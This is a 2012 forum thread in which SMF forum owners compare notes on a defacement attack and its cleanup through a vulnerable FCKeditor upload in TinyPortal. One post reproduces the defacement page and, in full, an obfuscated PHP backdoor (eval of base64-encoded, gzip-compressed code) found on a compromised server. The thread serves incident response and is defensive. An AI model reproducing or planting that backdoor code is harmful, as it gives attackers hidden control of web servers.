News:

Bored?  Looking to kill some time?  Want to chat with other SMF users?  Join us in IRC chat or Discord

Main Menu

Help with hack SouTHRaNDA wAs HeRE

Started by Scooby, January 02, 2012, 06:18:58 PM

Previous topic - Next topic

TeaTephi

I was hacked also, but have followed the above advice and hopefully it will be ok now!  keeping watch on this thread, if any more great advice pops up, I will be heeding it for sure.
SMF 2.0.2 | TinyPortal 1.107 Veterans day theme Opera 11.50
Mods:Profile Comments.....AEVA Media 2.10.....Activity in profile.....join-reason....Bookmarks 2.3.....SA Chat    Beta 4-1 Rev43....Tapatalk SMF 2.0 RC4/RC5/Final Plugin    3.0.1.....SMFPacks Likes Lite Mod

Thank you guys for all your support and development that you do.  I love my forum, and am so thankful to have a place to ask my questions.  I do love SMF 2.0 it's smoother and all my members love it!

slvreagl

In case anyone was wondering this is the code on all three files that where hacked on my site, Index.php, Settings.php, SSI.php
<html>
    <head>
        <meta content="DiRTY SouTH" name="copyright">
        <meta content="southranda, dirty south, southranda was here" name="keywords">
        <meta content="SouTHRaNDA wAs HeRE" name="description">
        <title>by SouTHRaNDA</title>
        <link href="http://i.lulzimg.com/9b7d4026e6.gif" rel="shortcut icon">
    </head>
    <body bgcolor="#ffffff" text="#a9a9a9" onmousedown="return false;" onkeydown="return false;" oncontextmenu="return false;">
       <br>
       <div align="center">
           <br>
           <b>SouTHRaNDA wAs HeRE</b><br><br><i>con gli occhi rossi</i><br>
           <br>
           <img src="http://i.imgur.com/QmRje.jpg">
           <br>
           <br>
           <i>porta droga<br><br>bianca vergine pura<br><br>toglimi la paura</i><br><br><br>© <b>DiRTY SouTH</b><br>
           <br>
           <br>
           <embed src="http://www.youtube.com/v/oij0kscC2Yc&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
       </div>
    </body>
</html>


Also found and deleted the directory tp-images/File
with the following files:
weba.php.pjpg

index.php
<?php /*00000000000000000000000000000000*/ eval(gzinflate(base64_decode('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')));?>
<?php

exit;

?>

21032012.html
<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=windows-1251">

</head>

<body>

21_03_2012 01

</body>

</html>

TeaTephi

Quote from: Lord Anubis on April 10, 2012, 04:37:44 PM
Thanks Brad, think I did remove the FCKeditor when I read about the vulnerability in the past. 

Also noticed this hacker added 404.php files in a few folders (so others might want to look for that as well)

- Root
- Themes
- Sources

I already cleared these files from my server, and I didn't save them (so I can't post them up)


I found one of these files in my root folder.  Not sure if you guys want me to upload it here?  or just delete it.  I haven't checked my SSI file, but I will today.

SMF 2.0.2 | TinyPortal 1.107 Veterans day theme Opera 11.50
Mods:Profile Comments.....AEVA Media 2.10.....Activity in profile.....join-reason....Bookmarks 2.3.....SA Chat    Beta 4-1 Rev43....Tapatalk SMF 2.0 RC4/RC5/Final Plugin    3.0.1.....SMFPacks Likes Lite Mod

Thank you guys for all your support and development that you do.  I love my forum, and am so thankful to have a place to ask my questions.  I do love SMF 2.0 it's smoother and all my members love it!

thefley

So i downloaded the tp-images/File to my desktop to take a look at the files AVG popped up with 2
"Trojan horse PHP/BackDoor.BH"
"Trojan horse PHP/BackDoor.Cp"

files found......  so this looks like one way they are getting in.

www.greatplainsriders.com

IchBin™

For those of you running TinyPortal make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.

Has anyone contacted their host to get help with their problem?
IchBin™        TinyPortal

TeaTephi

#25
Quote from: IchBin™ on April 12, 2012, 05:27:15 PM
For those of you running TinyPortal make sure you are running the latest version. If you have any previous older install of TP on your forum, make sure you remove the FCKEditor folder.

Has anyone contacted their host to get help with their problem?

I contacted godaddy today, and purchased their security app, and submitted a ticket with all the problems that I had.

One thing that really annoyed me was that southranda took over my profile on my forum, and I had to come on as another admin and delete myself in order to delete him.  I was panicked, probably not the best choice, but I still have my forum in tact.

I also submitted a report here with all the info they required (i think).  Hopefully we'll get to the bottom of this soon.

BTW, I did delete the FCKeditor and the file in tp-images, and updated TP.

EDIT:
Quote from: GoDaddy support
Dear Sir/Madam,

Thank you for contacting the Website Protection Customer Security Advisors.  We understand that your site recently was attacked and defaced by an attacker.  From a review of the site logs, it appears that a vulnerable version of FCKeditor was used in order to upload a malicious file to the hosting plan on 4/9/12.  Using this malicious file, the attacker was able to upload additional malicious files as well as modify your index page.  At this time it does appear that you have already removed the FCKeditor folder as well as the malicious files the attacker was able to upload.  A sample of logs has been provided and as can be seen from the logs, the attacker was able to read your configuration file in order to gain your database password.  The attacker appears to have made a connection to the database and it's possible that changes could have been made to the database or content copied from the database. You will want to ensure that your users all update their login information to the site as well as ensure that they update their passwords on other sites if they use the same password for multiple websites.  As a precaution you may wish to restore your database prior to 4/9/12 if you have a backup of the database that you can verify is clean.
SMF 2.0.2 | TinyPortal 1.107 Veterans day theme Opera 11.50
Mods:Profile Comments.....AEVA Media 2.10.....Activity in profile.....join-reason....Bookmarks 2.3.....SA Chat    Beta 4-1 Rev43....Tapatalk SMF 2.0 RC4/RC5/Final Plugin    3.0.1.....SMFPacks Likes Lite Mod

Thank you guys for all your support and development that you do.  I love my forum, and am so thankful to have a place to ask my questions.  I do love SMF 2.0 it's smoother and all my members love it!

IchBin™

If you did indeed had the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.

FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.
IchBin™        TinyPortal

TeaTephi

Quote from: IchBin™ on April 12, 2012, 08:48:13 PM
If you did indeed had the FCKeditor folder, and were using TP prior to version 1RC1.2, then I'm pretty sure that was your problem. tp-images/ folder now has a .htaccess file to prevent files from being executed in it, and also TP should not allow anything but images to be uploaded to the directory.

FCKEditor had a file upload exploit that allowed exactly the same problem you have experienced.

Yep I had that folder, and the TP version was 1.104.   I've got it all correct now.  I wish I had deleted it earlier!

Oh it was weird that the hacker himself deleted the FCKeditor from my site.  I thought that was weird, like he closed the door behind him, so no one else could break in?
SMF 2.0.2 | TinyPortal 1.107 Veterans day theme Opera 11.50
Mods:Profile Comments.....AEVA Media 2.10.....Activity in profile.....join-reason....Bookmarks 2.3.....SA Chat    Beta 4-1 Rev43....Tapatalk SMF 2.0 RC4/RC5/Final Plugin    3.0.1.....SMFPacks Likes Lite Mod

Thank you guys for all your support and development that you do.  I love my forum, and am so thankful to have a place to ask my questions.  I do love SMF 2.0 it's smoother and all my members love it!

IchBin™

haha, maybe so. But yeah, that is definitely weird.
IchBin™        TinyPortal

MrPhil

Quote from: TeaTephi on April 12, 2012, 09:20:22 PM
Oh it was weird that the hacker himself deleted the FCKeditor from my site.  I thought that was weird, like he closed the door behind him, so no one else could break in?

It's not the first time that's been done. I seem to recall hearing of viruses that disable competing viruses.

Advertisement: